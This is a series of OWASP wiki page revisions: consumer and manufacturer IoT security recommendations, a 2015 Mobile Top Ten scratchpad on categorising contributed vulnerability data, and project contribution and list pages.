* Ensure all applications are written to process encrypted update files and that the files are transmitted using encryption
* Ensure all applications are written to process signed files and then validate that file before installation

|-
| '''I10: Poor Physical Security'''
|
* Ensure applications are written to utilize a minimal number of physical external ports (e.g. USB ports) on the device
* Ensure all applications can not be accessed via unintended methods such as through an unnecessary USB port
* Ensure all applications are written to allow for disabling of unused physical ports such as USB
* Consider writing applications to limit administrative capabilities to a local interface only
|}

===General Recommendations===

Consider the following recommendations for all user interfaces (local device, cloud-based and mobile):
* Avoid potential Account Harvesting issues by:
** Ensuring valid user accounts can't be identified by interface error messages
** Ensuring strong passwords are required by users
** Implementing account lockout after 3 - 5 failed login attempts

[ NOTE: Given the fact that each deployment and every environment is different, it is important to weigh the pros and cons of implementing the advice above before taking each step. ]

= Consumers =

== Consumer IoT Security Guidance ==

(DRAFT)

The goal of this page is help consumers purchase secure products in the Internet of Things space. The guidance below is at a basic level, giving consumers a basic set of guidelines to consider from their perspective. This is not a comprehensive list of considerations, and should not be treated as such, but ensuring that these fundamentals are covered will greatly aid the consumer in purchasing a secure IoT product.

{| border="1" class="wikitable" style="text-align: left"
! Category
! IoT Security Consideration
|-
| '''I1: Insecure Web Interface'''
|
* If your system has the option to use HTTPS, ensure it is enabled
* If your system has a two factor authentication option, ensure that it is enabled
* If your system has web application firewall option, ensure that it is enabled
* If your system has a local or cloud-based web application, ensure that you change the default password to a strong one and if possible change the default username as well
* If the system has account lockout functionality, ensure that it is enabled
* Consider employing network segmentation technologies such as firewalls to isolate IoT systems from critical IT systems
|-
| '''I2: Insufficient Authentication/Authorization'''
|
* If your system has a local or cloud-based web application, ensure that you change the default password to a strong one and if possible change the default username as well
* If the system has account lockout functionality, ensure that it is enabled
* If the system has the option to require strong passwords, ensure that is enabled
* If the system has the option to require new passwords after 90 days for example, ensure that is enabled
* If your system has a two factor authentication option, ensure that it is enabled
* If your system has the option to set user privileges, consider setting user privileges to the minimal needed for operation
* Consider employing network segmentation technologies such as firewalls to isolate IoT systems from critical IT systems
|-
| '''I3: Insecure Network Services'''
|
* If your system has a firewall option available, enable it and ensure that it can only be accessed from your client systems
* Consider employing network segmentation technologies such as firewalls to isolate IoT systems from critical IT systems
|-
| '''I4: Lack of Transport Encryption'''
|
* If your system has the option to use HTTPS, ensure it is enabled
|-
| '''I5: Privacy Concerns'''
|
* Do not enter sensitive information into the system that is not absolutely required, e.g. address, DOB, CC, etc.
* Deny data collection if it appears to be beyond what is needed for proper operation of the device (If provided the choice)
|-
| '''I6: Insecure Cloud Interface'''
|
* If your system has the option to use HTTPS, ensure it is enabled
* If your system has a two factor authentication option, ensure that it is enabled
* If your system has web application firewall option, ensure that it is enabled
* If your system has a local or cloud-based web application, ensure that you change the default password to a strong one and if possible change the default username as well
* If the system has account lockout functionality, ensure that it is enabled
* If the system has the option to require strong passwords, ensure that is enabled
* If the system has the option to require new passwords after 90 days for example, ensure that is enabled
|-
| '''I7: Insecure Mobile Interface'''
|
* If the mobile application has the option to require a PIN or password, consider using it for extra security (on client and server)
* If the mobile application has the option to use two factory authentication such as Apple's Touch ID, ensure it is enabled
* If the system has account lockout functionality, ensure that it is enabled
* If the system has the option to require strong passwords, ensure that is enabled
* If the system has the option to require new passwords after 90 days for example, ensure that is enabled
* Do not enter sensitive information into the mobile application that is not absolutely required, e.g. address, DOB, CC, etc.
|-
| '''I8: Insufficient Security Configurability'''
|
* If your system has the option, enable any logging functionality for security-related events
* If your system has the option, enable any alert and notification functionality for security-related events
* If your system has security options for passwords, ensure they are enabled for strong passwords
* If your system has security options for encryption, ensure they are set for an accepted standard such as AES-256
|-
| '''I9: Insecure Software/Firmware'''
|
* If your system has the option to verify updates, ensure it is enabled
* If your system has the option to download updates securely, ensure it is enabled
* If your system has the ability to schedule updates on a regular cadence, consider enabling it
|-
| '''I10: Poor Physical Security'''
|
* If your system has the ability to limit administrative capabilities possible by connecting locally, consider enabling that feature
* Disable any unused physical ports through the administrative interface
|}

===General Recommendations===

If you are looking to purchase a device or system, consider the following recommendations:
* Include security in feature considerations when evaluating a product
* Place Internet of Things devices on a separate network if possible using a firewall

[ NOTE: Given the fact that each deployment and every environment is different, it is important to weigh the pros and cons of implementing the advice above before taking each step. ]

= Project Details =

<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div>

{{:Projects/OWASP_Internet_of_Things_Top_Ten_Project}}

__NOTOC__ <headertabs />

[[Category:OWASP_Project]] [[Category:OWASP_Document]] [[Category:OWASP_Download]] [[Category:OWASP_Release_Quality_Document]]

Projects/OWASP Mobile Security Project -2015 Scratchpad

2015-03-03T17:09:59Z

Jason Haddix: /* Comments on Submitted Data */

This is just a place to gather some ideas for the 2015 reworking of the Mobile Top Ten. It's totally unofficial open musings about truth, beauty, and justice.

=What is It?=

This is the "Mobile Top Ten" ''what''? It's the top 10 "stuff people tend to screw up", but here are some important questions.

* Business risk or technical risk? The business risk would be something like "intellectual property unprotected" or "customer data exposed." A technical risk would be something like "data stored in plain text files."

* Root cause, or final impact? Often root causes are things like not encrypting when we should. Final impact is stuff like unintended data leaks. The problem is that some of these things are overlapping. Not every lack of crypto is a data leak, but many are.

* What threats are in scope? There are apps that simply do not care about protecting from malware, jailbreaking, etc. Think Yelp: it's just restaurant reviews. No financial impact, no reason to care about many client-side attacks. Plenty of apps ''do'' care about client-side attacks. E.g., banking, communications, health data. Many items hinge on whether or not you care about client side attacks. How do we capture this?
** If you care about client-side attacks, then failing to encrypt stuff is basically a data leakage.
** If you don't care about client-side attacks, then failing to encrypt stuff is kinda "gee you should do that".
** If you care about client-side attacks, there are probably some platform features that are not sufficient as-is: the app sandbox, etc. You probably want to be putting your own additional layer of encryptiong / protection, etc.
** If you don't care about client-side attacks, then you simply need to be using the standard APIs (keychain, app data storage, etc.) in the standard supported ways.

=Who is it For?=

Do we intend this to be a tool that infosec / appsec people use? Do we intend lay people to make use of it? (e.g., developers and non-mobile IT security people) What does the target audience need to get from it?

(''Paco's opinion'') We need to have a narrative: If you found functionality that does X, it is probably in bucket A, unless it is also doing (or not doing) Y, in which case that's bucket B.

=Comments on Submitted Data=

==General==

(Jason) By looking at some data sets it becomes clear there is a doctrine that some consultancies use to do mobile testing. Some did not contribute m1 data, because they consider mobile security client-only. The same applied to m10. In addition, a couple of datasets used CWE IDs. These were harder to parse because generic CWE's do not specify if the vuln is client or server (and in a lot of these cases the vuln could be either). As Paco stated, code quality, source level findings are hard to categorize as well.

==BugCrowd==
I see “storing passwords in the clear” as a very common finding among their data. It gets classifed as M5 poor authentication, M2 insecure data storage, M4 data leakage, and sometimes M6 (broken crypto).

I see “storing session tokens insecurely” as a common finding. It is getting classified as M9 (session handling) and M2 (insecure data storage). I wonder openly whether passwords and session tokens are really that different.

We see a lot of caching of non-password, non-session data. Some of it is done explicitly by the app, some of it is done by the mobile OS through snapshotting, backups, etc. Sometimes it is classified as “data leakage” (M4) and sometimes as insecure storage (M2). And what is interesting is that some of it is the result of the OS and some is the result of the app. Do we want to make that distinction in the T10?

==MetaIntelli==

They only have 18 distinct things they report on, though they have 111,000 data points. Two of the 18 things are double-counted. They appear to be categorised in both M3 and another one.

=Other Questions=
Communications issues are a problem a lot. But TLS and crypto are tightly coupled. “Communications issues" includes certificate pinning, weak TLS ciphers, improper cert validation, HTTP and plaintext protocols, and more. There’s a lot of overlap with “broken crypto” like using Base64 instead of encryption, hard coded keys/passwords, weak hash algorithms, and so on. How do we tease out “crypto” issues from “communications” issues from “insecure storage” issues?

I can imagine a heuristic like this:
* did you use crypto where you were supposed to, but the crypto primitive you chose wasn’t appropriate for the task? That’s broken crypto.
* Did you omit crypto entirely when you should have used it? That’s insecure comms or insecure storage.

Some findings are deeply mobile (e.g., intent hijacking, keychain issues, jailbreak/root detection, etc.). They’re really tied to their respective platforms. Is that a problem for us? Does it matter?

=Conclusions Drawn From Data=
These are conclusions proposed from the 2014 data.
==At Least One New Category Is Needed==
((Paco)) The "Other" category is not the least popular category. It's more popular, by an order of magnitude, than several others. This tells me that if we had a better category that captured "other" findings, it would be a benefit to the users of the top 10.

==The Bottom 5 Categories account for 25% Or Less==

The least popular 5 items are (where "1" is the least popular and "5" is 5th least popular or 6th most popular):

# M8: Security Decisions Via Untrusted Inputs
# M7: Client Side Injection
# M9: Improper Session Handling
# M6: Broken Cryptography
# M1: Weak Server Side Controls

Combined with the fact that the 3rd or 4th most popular category is "Other", this suggests that 2 or 3 of these are, in fact, not in the "top ten". They may be, for example, 11 and 12 or even higher.

==The Existing Buckets are Hard To Use==

A few contributors tried to categorise their findings into the existing MT10. When they did, they showed symptoms of difficulty. Some examples in the table below show how MetaIntelli flagged findings in two different categories, and BugCrowd flagged the same kind of finding in 3 different categories. This suggests that the existing MT10 is not clear enough about where these issues belong.

{|
! Description
! Contributor
! Categories
|-
|The app is not verifying hostname, certificate matching and validity when doing SSL secure connections.
|MetaIntelli
|M3 and M9
|-
|Contains URLs with not valid SSL certificates and/or chain of trust
|MetaIntelli
|M3 and M5
|-
|Authentication cookies stored in cleartext in sqlite database
|BugCrowd
|M9 - Improper Session Handling
|-
|Blackberry app stores credentials in plaintext
|BugCrowd
|M2 - Insecure Data Storage
|-
|Credentials and sensitive information not secured on Windows Phone app
|BugCrowd
|M5 - Poor Authorization and Authentication
|}

==Some Topics that Show Up But Are Hard To Place==

There are a few things that show up in the contributed data that do not have a good category to go into.

===Code Level Findings===

If someone is doing bad C coding (e.g., strcpy() and similar), there is no good bucket for that. Likewise, misusing the platform APIs (e.g., Android, iOS, etc.) is not well covered. It's hard to place violations of platform best practices (e.g., with intents and broadcasts and so on).

=Top Ten Scratchpad=
Here's some top-ten possible categories. This is a wiki. Edit them. Change them. Leave comments. Mark it up.

==M1: Weak Server Side Controls ==
Stuff

==M2: Insecure Data Storage ==
(Jason) As i look through the data I think more and more about how m2 and m4 might be combined.

==M3: Insufficient Transport Layer Protection ==
Stuff

==M4: Unintended Data Leakage ==

Stuff
==M5: Poor Authorization and Authentication ==

Stuff
==M6: Broken Cryptography ==

Stuff
==M7: Client Side Injection ==

Stuff
==M8: Security Decisions Via Untrusted Inputs ==

Stuff
==M9: Improper Session Handling ==

Stuff
==M10: Lack of Binary Protections ==

(Jason) Regarding m10 - Several submissions reported m10 vulns. Unfortunately some were types of services such as binary reputation scanners, that do not have the ability to check for dynamic or code level findings. In order to fix this i recommend a name change or re-working of this category. I want to separate out the delineation of Anti-exploit vs Code Obfuscation/Anti-reversing. Must talk to group about this.

Projects/OWASP Mobile Security Project -2015 Scratchpad

2015-03-03T17:03:48Z

Jason Haddix: /* M2: Insecure Data Storage */

This is just a place to gather some ideas for the 2015 reworking of the Mobile Top Ten. It's totally unofficial open musings about truth, beauty, and justice.

=What is It?=

This is the "Mobile Top Ten" ''what''? It's the top 10 "stuff people tend to screw up", but here are some important questions.

* Business risk or technical risk? The business risk would be something like "intellectual property unprotected" or "customer data exposed." A technical risk would be something like "data stored in plain text files."

* Root cause, or final impact? Often root causes are things like not encrypting when we should. Final impact is stuff like unintended data leaks. The problem is that some of these things are overlapping. Not every lack of crypto is a data leak, but many are.

* What threats are in scope? There are apps that simply do not care about protecting from malware, jailbreaking, etc. Think Yelp: it's just restaurant reviews. No financial impact, no reason to care about many client-side attacks. Plenty of apps ''do'' care about client-side attacks. E.g., banking, communications, health data. Many items hinge on whether or not you care about client side attacks. How do we capture this?
** If you care about client-side attacks, then failing to encrypt stuff is basically a data leakage.
** If you don't care about client-side attacks, then failing to encrypt stuff is kinda "gee you should do that".
** If you care about client-side attacks, there are probably some platform features that are not sufficient as-is: the app sandbox, etc. You probably want to be putting your own additional layer of encryptiong / protection, etc.
** If you don't care about client-side attacks, then you simply need to be using the standard APIs (keychain, app data storage, etc.) in the standard supported ways.

=Who is it For?=

Do we intend this to be a tool that infosec / appsec people use? Do we intend lay people to make use of it? (e.g., developers and non-mobile IT security people) What does the target audience need to get from it?

(''Paco's opinion'') We need to have a narrative: If you found functionality that does X, it is probably in bucket A, unless it is also doing (or not doing) Y, in which case that's bucket B.

=Comments on Submitted Data=

==BugCrowd==
I see “storing passwords in the clear” as a very common finding among their data. It gets classifed as M5 poor authentication, M2 insecure data storage, M4 data leakage, and sometimes M6 (broken crypto).

I see “storing session tokens insecurely” as a common finding. It is getting classified as M9 (session handling) and M2 (insecure data storage). I wonder openly whether passwords and session tokens are really that different.

We see a lot of caching of non-password, non-session data. Some of it is done explicitly by the app, some of it is done by the mobile OS through snapshotting, backups, etc. Sometimes it is classified as “data leakage” (M4) and sometimes as insecure storage (M2). And what is interesting is that some of it is the result of the OS and some is the result of the app. Do we want to make that distinction in the T10?

==MetaIntelli==

They only have 18 distinct things they report on, though they have 111,000 data points. Two of the 18 things are double-counted. They appear to be categorised in both M3 and another one.

=Other Questions=
Communications issues are a problem a lot. But TLS and crypto are tightly coupled. “Communications issues" includes certificate pinning, weak TLS ciphers, improper cert validation, HTTP and plaintext protocols, and more. There’s a lot of overlap with “broken crypto” like using Base64 instead of encryption, hard coded keys/passwords, weak hash algorithms, and so on. How do we tease out “crypto” issues from “communications” issues from “insecure storage” issues?

I can imagine a heuristic like this:
* did you use crypto where you were supposed to, but the crypto primitive you chose wasn’t appropriate for the task? That’s broken crypto.
* Did you omit crypto entirely when you should have used it? That’s insecure comms or insecure storage.

Some findings are deeply mobile (e.g., intent hijacking, keychain issues, jailbreak/root detection, etc.). They’re really tied to their respective platforms. Is that a problem for us? Does it matter?

=Conclusions Drawn From Data=
These are conclusions proposed from the 2014 data.
==At Least One New Category Is Needed==
((Paco)) The "Other" category is not the least popular category. It's more popular, by an order of magnitude, than several others. This tells me that if we had a better category that captured "other" findings, it would be a benefit to the users of the top 10.

==The Bottom 5 Categories account for 25% Or Less==

The least popular 5 items are (where "1" is the least popular and "5" is 5th least popular or 6th most popular):

# M8: Security Decisions Via Untrusted Inputs
# M7: Client Side Injection
# M9: Improper Session Handling
# M6: Broken Cryptography
# M1: Weak Server Side Controls

Combined with the fact that the 3rd or 4th most popular category is "Other", this suggests that 2 or 3 of these are, in fact, not in the "top ten". They may be, for example, 11 and 12 or even higher.

==The Existing Buckets are Hard To Use==

A few contributors tried to categorise their findings into the existing MT10. When they did, they showed symptoms of difficulty. Some examples in the table below show how MetaIntelli flagged findings in two different categories, and BugCrowd flagged the same kind of finding in 3 different categories. This suggests that the existing MT10 is not clear enough about where these issues belong.

{|
! Description
! Contributor
! Categories
|-
|The app is not verifying hostname, certificate matching and validity when doing SSL secure connections.
|MetaIntelli
|M3 and M9
|-
|Contains URLs with not valid SSL certificates and/or chain of trust
|MetaIntelli
|M3 and M5
|-
|Authentication cookies stored in cleartext in sqlite database
|BugCrowd
|M9 - Improper Session Handling
|-
|Blackberry app stores credentials in plaintext
|BugCrowd
|M2 - Insecure Data Storage
|-
|Credentials and sensitive information not secured on Windows Phone app
|BugCrowd
|M5 - Poor Authorization and Authentication
|}

==Some Topics that Show Up But Are Hard To Place==

There are a few things that show up in the contributed data that do not have a good category to go into.

===Code Level Findings===

If someone is doing bad C coding (e.g., strcpy() and similar), there is no good bucket for that. Likewise, misusing the platform APIs (e.g., Android, iOS, etc.) is not well covered. It's hard to place violations of platform best practices (e.g., with intents and broadcasts and so on).

=Top Ten Scratchpad=
Here's some top-ten possible categories. This is a wiki. Edit them. Change them. Leave comments. Mark it up.

==M1: Weak Server Side Controls ==
Stuff

==M2: Insecure Data Storage ==
(Jason) As i look through the data I think more and more about how m2 and m4 might be combined.

==M3: Insufficient Transport Layer Protection ==
Stuff

==M4: Unintended Data Leakage ==

Stuff
==M5: Poor Authorization and Authentication ==

Stuff
==M6: Broken Cryptography ==

Stuff
==M7: Client Side Injection ==

Stuff
==M8: Security Decisions Via Untrusted Inputs ==

Stuff
==M9: Improper Session Handling ==

Stuff
==M10: Lack of Binary Protections ==

(Jason) Regarding m10 - Several submissions reported m10 vulns. Unfortunately some were types of services such as binary reputation scanners, that do not have the ability to check for dynamic or code level findings. In order to fix this i recommend a name change or re-working of this category. I want to separate out the delineation of Anti-exploit vs Code Obfuscation/Anti-reversing. Must talk to group about this.

Projects/OWASP Mobile Security Project -2015 Scratchpad

2015-03-03T16:57:13Z

Jason Haddix: /* M10: Lack of Binary Protections */

This is just a place to gather some ideas for the 2015 reworking of the Mobile Top Ten. It's totally unofficial open musings about truth, beauty, and justice.

=What is It?=

This is the "Mobile Top Ten" ''what''? It's the top 10 "stuff people tend to screw up", but here are some important questions.

* Business risk or technical risk? The business risk would be something like "intellectual property unprotected" or "customer data exposed." A technical risk would be something like "data stored in plain text files."

* Root cause, or final impact? Often root causes are things like not encrypting when we should. Final impact is stuff like unintended data leaks. The problem is that some of these things are overlapping. Not every lack of crypto is a data leak, but many are.

* What threats are in scope? There are apps that simply do not care about protecting from malware, jailbreaking, etc. Think Yelp: it's just restaurant reviews. No financial impact, no reason to care about many client-side attacks. Plenty of apps ''do'' care about client-side attacks. E.g., banking, communications, health data. Many items hinge on whether or not you care about client side attacks. How do we capture this?
** If you care about client-side attacks, then failing to encrypt stuff is basically a data leakage.
** If you don't care about client-side attacks, then failing to encrypt stuff is kinda "gee you should do that".
** If you care about client-side attacks, there are probably some platform features that are not sufficient as-is: the app sandbox, etc. You probably want to be putting your own additional layer of encryptiong / protection, etc.
** If you don't care about client-side attacks, then you simply need to be using the standard APIs (keychain, app data storage, etc.) in the standard supported ways.

=Who is it For?=

Do we intend this to be a tool that infosec / appsec people use? Do we intend lay people to make use of it? (e.g., developers and non-mobile IT security people) What does the target audience need to get from it?

(''Paco's opinion'') We need to have a narrative: If you found functionality that does X, it is probably in bucket A, unless it is also doing (or not doing) Y, in which case that's bucket B.

=Comments on Submitted Data=

==BugCrowd==
I see “storing passwords in the clear” as a very common finding among their data. It gets classifed as M5 poor authentication, M2 insecure data storage, M4 data leakage, and sometimes M6 (broken crypto).

I see “storing session tokens insecurely” as a common finding. It is getting classified as M9 (session handling) and M2 (insecure data storage). I wonder openly whether passwords and session tokens are really that different.

We see a lot of caching of non-password, non-session data. Some of it is done explicitly by the app, some of it is done by the mobile OS through snapshotting, backups, etc. Sometimes it is classified as “data leakage” (M4) and sometimes as insecure storage (M2). And what is interesting is that some of it is the result of the OS and some is the result of the app. Do we want to make that distinction in the T10?

==MetaIntelli==

They only have 18 distinct things they report on, though they have 111,000 data points. Two of the 18 things are double-counted. They appear to be categorised in both M3 and another one.

=Other Questions=
Communications issues are a problem a lot. But TLS and crypto are tightly coupled. “Communications issues" includes certificate pinning, weak TLS ciphers, improper cert validation, HTTP and plaintext protocols, and more. There’s a lot of overlap with “broken crypto” like using Base64 instead of encryption, hard coded keys/passwords, weak hash algorithms, and so on. How do we tease out “crypto” issues from “communications” issues from “insecure storage” issues?

I can imagine a heuristic like this:
* did you use crypto where you were supposed to, but the crypto primitive you chose wasn’t appropriate for the task? That’s broken crypto.
* Did you omit crypto entirely when you should have used it? That’s insecure comms or insecure storage.

Some findings are deeply mobile (e.g., intent hijacking, keychain issues, jailbreak/root detection, etc.). They’re really tied to their respective platforms. Is that a problem for us? Does it matter?

=Conclusions Drawn From Data=
These are conclusions proposed from the 2014 data.
==At Least One New Category Is Needed==
((Paco)) The "Other" category is not the least popular category. It's more popular, by an order of magnitude, than several others. This tells me that if we had a better category that captured "other" findings, it would be a benefit to the users of the top 10.

==The Bottom 5 Categories account for 25% Or Less==

The least popular 5 items are (where "1" is the least popular and "5" is 5th least popular or 6th most popular):

# M8: Security Decisions Via Untrusted Inputs
# M7: Client Side Injection
# M9: Improper Session Handling
# M6: Broken Cryptography
# M1: Weak Server Side Controls

Combined with the fact that the 3rd or 4th most popular category is "Other", this suggests that 2 or 3 of these are, in fact, not in the "top ten". They may be, for example, 11 and 12 or even higher.

==The Existing Buckets are Hard To Use==

A few contributors tried to categorise their findings into the existing MT10. When they did, they showed symptoms of difficulty. Some examples in the table below show how MetaIntelli flagged findings in two different categories, and BugCrowd flagged the same kind of finding in 3 different categories. This suggests that the existing MT10 is not clear enough about where these issues belong.

{|
! Description
! Contributor
! Categories
|-
|The app is not verifying hostname, certificate matching and validity when doing SSL secure connections.
|MetaIntelli
|M3 and M9
|-
|Contains URLs with not valid SSL certificates and/or chain of trust
|MetaIntelli
|M3 and M5
|-
|Authentication cookies stored in cleartext in sqlite database
|BugCrowd
|M9 - Improper Session Handling
|-
|Blackberry app stores credentials in plaintext
|BugCrowd
|M2 - Insecure Data Storage
|-
|Credentials and sensitive information not secured on Windows Phone app
|BugCrowd
|M5 - Poor Authorization and Authentication
|}

==Some Topics that Show Up But Are Hard To Place==

There are a few things that show up in the contributed data that do not have a good category to go into.

===Code Level Findings===

If someone is doing bad C coding (e.g., strcpy() and similar), there is no good bucket for that. Likewise, misusing the platform APIs (e.g., Android, iOS, etc.) is not well covered. It's hard to place violations of platform best practices (e.g., with intents and broadcasts and so on).

=Top Ten Scratchpad=
Here's some top-ten possible categories. This is a wiki. Edit them. Change them. Leave comments. Mark it up.

==M1: Weak Server Side Controls ==
Stuff

==M2: Insecure Data Storage ==
Stuff

==M3: Insufficient Transport Layer Protection ==
Stuff

==M4: Unintended Data Leakage ==

Stuff
==M5: Poor Authorization and Authentication ==

Stuff
==M6: Broken Cryptography ==

Stuff
==M7: Client Side Injection ==

Stuff
==M8: Security Decisions Via Untrusted Inputs ==

Stuff
==M9: Improper Session Handling ==

Stuff
==M10: Lack of Binary Protections ==

(Jason) Regarding m10 - Several submissions reported m10 vulns. Unfortunately some were types of services such as binary reputation scanners, that do not have the ability to check for dynamic or code level findings. In order to fix this i recommend a name change or re-working of this category. I want to separate out the delineation of Anti-exploit vs Code Obfuscation/Anti-reversing. Must talk to group about this.

Mobile Top Ten Contributions

2015-01-21T17:45:57Z

Jason Haddix:

This page is a work in progress. If we have omitted you, or incorrectly affiliated you, please contact us right away.

== Project Leads ==

* [mailto:jason.haddix@owasp.org Jason Haddix - HP Fortify]
* [mailto:daniel.meissler@owasp.org Daniel Miessler - HP Fortify]

== Wiki Content ==

* Zach Lanier
* Mike Zuzman
* [mailto:jason.haddix@owasp.org Jason Haddix - HP Fortify]
* [mailto:daniel.meissler@owasp.org Daniel Miessler - HP Fortify]
* Rahil Parikh - Gotham Digital Science
* Ron Gutierrez - Gotham Digital Science
* [mailto:jonathan.carter@owasp.org Jonathan Carter - Arxan Technologies]
* [mailto:chad.butler@owasp.org Chad Butler - Concur Technologies]

== Data ==

* [http://www8.hp.com/us/en/software-solutions/fortify-on-demand-application-security/mobile-application-security.html HP Fortify]
* [https://twitter.com/andresitoath Andreas Athanasoulias & Syntax IT]
* [http://www.espheresecurity.com/ Hemil Shah and eSphere Security]
* [http://www.riis.com/ Godfrey Nolan and RIIS (Research Into Internet Systems)]
* [http://www.arxan.com/ Arxan Technologies]

== 2015 Data sets (raw) ==

The 2015 data sets are stored at the below link:

[https://www.dropbox.com/sh/ts32chiqnglqvy4/AADVrJCV96xTsm_sxKILxF0La?dl=0 https://www.dropbox.com/sh/ts32chiqnglqvy4/AADVrJCV96xTsm_sxKILxF0La?dl=0]

== Additional Thanks ==

* Jim Mannico
* Paco Hope

Mobile Top Ten Contributions

2015-01-06T18:27:36Z

Jason Haddix:

Projects/OWASP Mobile Security Project - Top Ten Mobile Risks

2014-11-05T23:08:46Z

Jason Haddix: /* Call to Action for 2015 */

<center><br style="clear:both" />
{| align="center" style="width:45%; background-color:#FFFFFF; border:1px solid #a7d7f9; -moz-border-radius: 9px;-webkit-border-radius: 9px; border-radius: 9px; padding:1px;" id="social_bookmarks" class="noprint"
|-
|
<div class="plainlinks" align="center">
'''Share this:''' 
<span title="Share via e-mail" class="plainlinks">[[File:social-email.png|E-mail this story|link=mailto:?subject={{FULLPAGENAMEE}}&body={{FULLPAGENAMEE}}:%0A{{fullurle:{{FULLPAGENAME}}}}]]</span>
<span title="Share on Facebook">[[File:social-facebook.png|Bookmark with Facebook|link=http://www.facebook.com/sharer.php?u={{fullurle:{{FULLPAGENAME}}}}&t={{urlencode:{{FULLPAGENAME}}}}]]</span>
<span title="Share on Digg">[[File:social-digg.png|Share on Digg.com|link=http://digg.com/submit?url={{fullurle:{{FULLPAGENAME}}}}&title={{urlencode:{{FULLPAGENAME}} }}]]</span>
<span title="Share on delicious">[[File:social-delicious.png|16px|Share on delicious|link=http://delicious.com/post?url={{fullurle:{{FULLPAGENAME}}}}&title={{urlencode:{{FULLPAGENAME}}}}]]</span>
<span title="Share on reddit">[[File:social-reddit.png|Share on reddit.com|link=http://reddit.com/submit?url={{fullurle:{{FULLPAGENAME}}}}&title={{urlencode:{{FULLPAGENAME}}}}]]</span>
<span title="Share on StumbleUpon">[[File:social-stumbleupon.png|16px|Share on stumbleupon.com|link=http://stumbleupon.com/submit?url={{fullurle:{{FULLPAGENAME}}}}&title={{urlencode:{{FULLPAGENAME}}}}]]</span>
<span title="Share on LinkedIn">[[File:social-linkedin.png|16px|Share on LinkedIn.com|link=http://www.linkedin.com/shareArticle?mini=true&url={{fullurle:{{FULLPAGENAME}}}}&title={{urlencode:{{FULLPAGENAME}}}}]]</span>
<span title="Share on Twitter">[[File:social-twitter.png|alt=Share on twitter.com|link=http://twitter.com/?status={{fullurle:{{FULLPAGENAME}}}}|Share on twitter.com]]</span>
<span title="Seed on Newsvine">[[File:social-newsvine.png|16px|Seed on Newsvine|link=http://www.newsvine.com/_wine/save?popoff=1&u={{fullurle:{{FULLPAGENAME}}}}]]</span>
</div>
|}
</center>
== About this list ==
In 2013, we polled the industry for new vulnerability statistics in the field of mobile applications. What you see here is a result of that data and a representation of the mobile application threat landscape.

Our goals for the 2014 list included the following:
[[File:2014-01-26 20-23-29.png|right|550px]]
* Updates to the wiki content; including cross-linking to testing guides, more visual exercises, etc;
* Generation of more data; and
* A PDF release.

This list has been finalized after a 90-day feedback period from the community. Based on feedback, we intend on releasing a Mobile Top Ten 2015 list following a similar approach of collecting data, grouping the data in logical and consistent ways.

Feel free to visit [https://groups.google.com/a/owasp.org/forum/#!forum/owasp-mobile-top-10-risks the mailing list] as well!

== Call to Action for 2015 ==
We are currently looking for vendors, consultants, or other industry experts within the appsec community that are willing to participate in the OWASP Mobile Top Ten 2015. Participation could include any of the following: gathering data, promoting awareness, etc.

We have published a [https://docs.google.com/viewer?a=v&pid=forums&srcid=MTM2MzA3NTkyMzA4NjgxNjcwNjQBMTU5NDg1NTE3NTg0NTgyOTMzOTgBUmEtcUZEUFNUVzRKATAuMQFvd2FzcC5vcmcBdjI Call for Data document] and have also (in the name of transparency) [https://docs.google.com/spreadsheets/d/16bW_VhEIlFU4cfN8BOOk40-XN93FM0f0Sxcx67NwPcg/edit?usp=sharing published a document] which lists which entities/vendors/individuals/etc that we have reached out to. These requests were made because we know these entities to be thought leaders in the mobile application space. If we missed you, and you have data or feedback to contribute, we apologize. Please email one of us!

== Top 10 Mobile Risks - Final List 2014 ==
*[[Mobile_Top_10_2014-M1|M1: Weak Server Side Controls ]]
*[[Mobile_Top_10_2014-M2|M2: Insecure Data Storage ]]
*[[Mobile_Top_10_2014-M3|M3: Insufficient Transport Layer Protection ]]
*[[Mobile_Top_10_2014-M4|M4: Unintended Data Leakage ]]
*[[Mobile_Top_10_2014-M5|M5: Poor Authorization and Authentication ]]
*[[Mobile_Top_10_2014-M6|M6: Broken Cryptography ]]
*[[Mobile_Top_10_2014-M7|M7: Client Side Injection ]]
*[[Mobile_Top_10_2014-M8|M8: Security Decisions Via Untrusted Inputs ]]
*[[Mobile_Top_10_2014-M9|M9: Improper Session Handling ]]
*[[Mobile_Top_10_2014-M10|M10: Lack of Binary Protections ]]

== Project Leads, Credit, and Contributions ==

* ''' [[Mobile_Top_Contributions|Mobile Top Ten Contributions Page ]] '''

== Project Methodology ==

* '''We adhered loosely to the [https://www.owasp.org/index.php/Top_10_2013/ProjectMethodology OWASP Web Top Ten Project methodology]. '''

== Archive ==
* The list below is the OLD release candidate v1.0 of the OWASP Top 10 Mobile Risks.  This list was initially released on September 23, 2011 at Appsec USA.  
** The original presentation can be found here: [http://www.slideshare.net/JackMannino/owasp-top-10-mobile-risks SLIDES]<br>
** The corresponding video can be found here: [http://www.youtube.com/watch?v=GRvegLOrgs0 VIDEO]
** [[Mobile_Top_10_2012|2011-12 Mobile Top Ten for archive purposes]]
__NOTOC__

Projects/OWASP Mobile Security Project - Top Ten Mobile Risks

2014-11-05T23:04:32Z

Jason Haddix:

<center><br style="clear:both" />
{| align="center" style="width:45%; background-color:#FFFFFF; border:1px solid #a7d7f9; -moz-border-radius: 9px;-webkit-border-radius: 9px; border-radius: 9px; padding:1px;" id="social_bookmarks" class="noprint"
|-
|
<div class="plainlinks" align="center">
'''Share this:''' 
<span title="Share via e-mail" class="plainlinks">[[File:social-email.png|E-mail this story|link=mailto:?subject={{FULLPAGENAMEE}}&body={{FULLPAGENAMEE}}:%0A{{fullurle:{{FULLPAGENAME}}}}]]</span>
<span title="Share on Facebook">[[File:social-facebook.png|Bookmark with Facebook|link=http://www.facebook.com/sharer.php?u={{fullurle:{{FULLPAGENAME}}}}&t={{urlencode:{{FULLPAGENAME}}}}]]</span>
<span title="Share on Digg">[[File:social-digg.png|Share on Digg.com|link=http://digg.com/submit?url={{fullurle:{{FULLPAGENAME}}}}&title={{urlencode:{{FULLPAGENAME}} }}]]</span>
<span title="Share on delicious">[[File:social-delicious.png|16px|Share on delicious|link=http://delicious.com/post?url={{fullurle:{{FULLPAGENAME}}}}&title={{urlencode:{{FULLPAGENAME}}}}]]</span>
<span title="Share on reddit">[[File:social-reddit.png|Share on reddit.com|link=http://reddit.com/submit?url={{fullurle:{{FULLPAGENAME}}}}&title={{urlencode:{{FULLPAGENAME}}}}]]</span>
